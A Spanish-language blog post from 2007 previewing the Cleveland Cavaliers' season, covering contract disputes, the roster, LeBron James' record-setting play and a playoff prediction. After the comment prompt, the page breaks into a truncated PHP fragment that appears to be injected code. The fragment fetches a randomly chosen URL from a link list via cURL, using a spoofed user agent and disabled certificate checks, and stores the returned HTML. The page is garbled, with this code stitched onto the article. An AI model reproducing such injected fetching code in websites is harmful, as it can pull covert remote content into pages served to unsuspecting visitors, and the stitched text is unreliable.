Cleveland Cavaliers: lo difícil no es llegar…

26 de November de 2007 por Gallis

…lo difícil es mantenerse. Al menos eso es lo que dice el refranero español. Rico y certero, ya se sabe. Y ése es el principal miedo que tienen este año en la capital del estado de Ohio. Cuando en el Draft del 2003 los Cavs eligieron con el número 1 al deseado por todos Lebron James, las esperanzas renacieron en Cleveland, pero ni los más optimistas del lugar podían esperar que en su cuarta temporada, The Chosen One les llevara de la mano, ni más ni menos, que a una final de la NBA. San Antonio fue demasiado para los Cavs, pero lo que el año pasado consiguió este equipo fue volver a ilusionar a una ciudad acostumbrada a un baloncesto de alto nivel (Mark Price, Brad Daugherty, Larry Nance, Ron Harper, etc.). Desde luego, motivos hay para la ilusión, pero visto lo sucedido este verano es probable que este equipo necesite más de un quinto partido de King James para volver a repetir semejante hazaña. Y las expectativas son tan altas que todo lo que no sea, al menos, una Final de Conferencia, puede ser una decepción.

Si un hecho ha marcado la pretemporada de los Cavs sin duda han sido las renovaciones. Dos elementos muy importantes del finalista de la NBA, Alexandar Pavlovic y Anderson Varejao, acababan contrato y James fue claro al respecto: sus renovaciones era vitales para el proyecto. Pues bien, de momento el proyecto ha sufrido su primer revés, ya que el pívot brasileño continúa de vacaciones y las diferencias económicas entre franquicia y jugador parecen insalvables. El ex del Barça pide 9 millones por cada una de las 5 ó 6 próximas temporadas pero Cleveland no está dispuesto a ir más allá de la mid-level. Veremos qué es lo que sucede. Mientras, tras muchos dimes y diretes, el escolta serbio acabó volviendo al redil y firmó por 3 años, a poco más de 4 millones por temporada. Operación importante, ya que el tiro exterior es una de las mayores debilidades del equipo.

Así las cosas, Cleveland afronta la temporada de la confirmación con, por así decirlo, una pata coja, pero aún así, como decíamos al principio, hay motivos para la esperanza. Uno de ellos será Daniel Gibson, si el jugador continúa su progresión. El base fue una de las sorpresas de los Playoffs, donde demostró que está capacitado para asumir la titularidad de un proyecto importante. Este año sus minutos aumentarán y también lo hará su responsabilidad. Si acepta el reto y lo supera será de gran ayuda. La gran incógnita es, un año más, Larry Hughes. Es muy difícil pensar en unos Cavs campeones sin un Hughes sano y pese a que la temporada pasada el escolta jugó 70 partidos, las lesiones son un compañero de viaje habitual del ex de Philadelphia, Golden State y Washington. Desde luego, cuesta pensar que Hughes pueda volver a ser el de 2005, año en el que lideró la liga en robos de balón (2.89), formó parte del quinteto defensivo de la NBA y promedió más de 22 puntos, 6 rebotes y 4 asistencias por partido. Si regresa ese jugador, habemus favorito en el Este, con permiso de Boston, claro. Por dentro, con la baja de Varejao, Gooden e Ilgauskas se quedan solos ante el peligro. El ex compañero de Gasol ha encontrado en Cleveland el entorno ideal para convertirse en un jugador importante y si le dan más minutos volverá a promediar los casi 15 puntos y 10 rebotes de temporadas pasadas. Pero si un jugador tiene que dar el paso y convertirse en el escudero de lujo de Bron, este es Zydrunas Ilgauskas. Lebron luchó en su momento por su renovación y es momento para devolver la confianza. Atrás han quedado los problemas físicos que atormentaron al lituano y Big Z debe ser un referente interior en el Este. Calidad tiene para ello.

El banquillo, por el contrario, aporta muchas sombras al futuro de la franquicia. Si los problemas físicos de Hughes persisten, Devin Brown echará una mano aportando veteranía. Pero éste es el refuerzo más importante del equipo, lo cual no es muy esperanzador. Damon Jones, Cedric Simmons, Ira Newble, Donyell Marshall o el rookie Demetris Nichols no parecen soluciones muy fiables para Mike Brown.

Pero cualquier análisis de Cleveland Cavaliers ha de estar marcado única y exclusivamente por una persona: Lebron James, The Chosen One, King James, Bron… al gusto del consumidor. Todo lo que se diga de él es poco. En su temporada rookie promedió más de 20 puntos, 5 rebotes y 5 asistencias por partido. Desde entonces nunca ha bajado de 25-6-6. De hecho, ha promediado más de 27-6-6 durante 3 temporadas seguidas, algo que sólo había conseguido antes Oscar Robertson. Y así hasta el infinito. James se ha convertido en un coleccionista de récords y estadísticas. Pero si alguien dudaba de él y pensaba que las estadísticas no lo son todo, sería conveniente recordar lo que pasó el 31 de mayo del presente año. Cleveland visitaba el Auburn Hills Palace de Detroit, con la final de la Conferencia empatada a 2 ante unos Pistons muy favoritos para disputar las finales de la NBA. Aquel día Lebron anotó 48 puntos, capturó 9 rebotes y repartió 7 asistencias. Pero lo que es más importante, cuando el partido se decidía, cuando todo estaba en juego, asumió el mando y demostró estar llamado a grandes cosas. Anotó 29 de los últimos 30 puntos de su equipo, o los 25 últimos, y llevó a su equipo a la victoria 107-109. Ese día Cleveland se clasificó para las Finales; el sexto se convirtió en, digámoslo así, un mero trámite. Seguramente no será la única final de la NBA que juegue la franquicia mientras Lebron siga siendo el capitán del equipo, pero si las cosas no cambian de aquí al próximo mes de febrero y la plantilla, mermada respecto al año anterior, no se refuerza, repetimos: los Cavs necesitarán más de un quinto partido de Lebron James para repetir final… en el Este. Lo de ganar al San Antonio de turno ya son palabras mayores.

Quinteto inicial: Gibson, Hughes, James, Gooden e Ilgauskas.

Sexto Hombre: Sasha Pavlovic.

Predicción: Segunda ronda de Playoffs.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>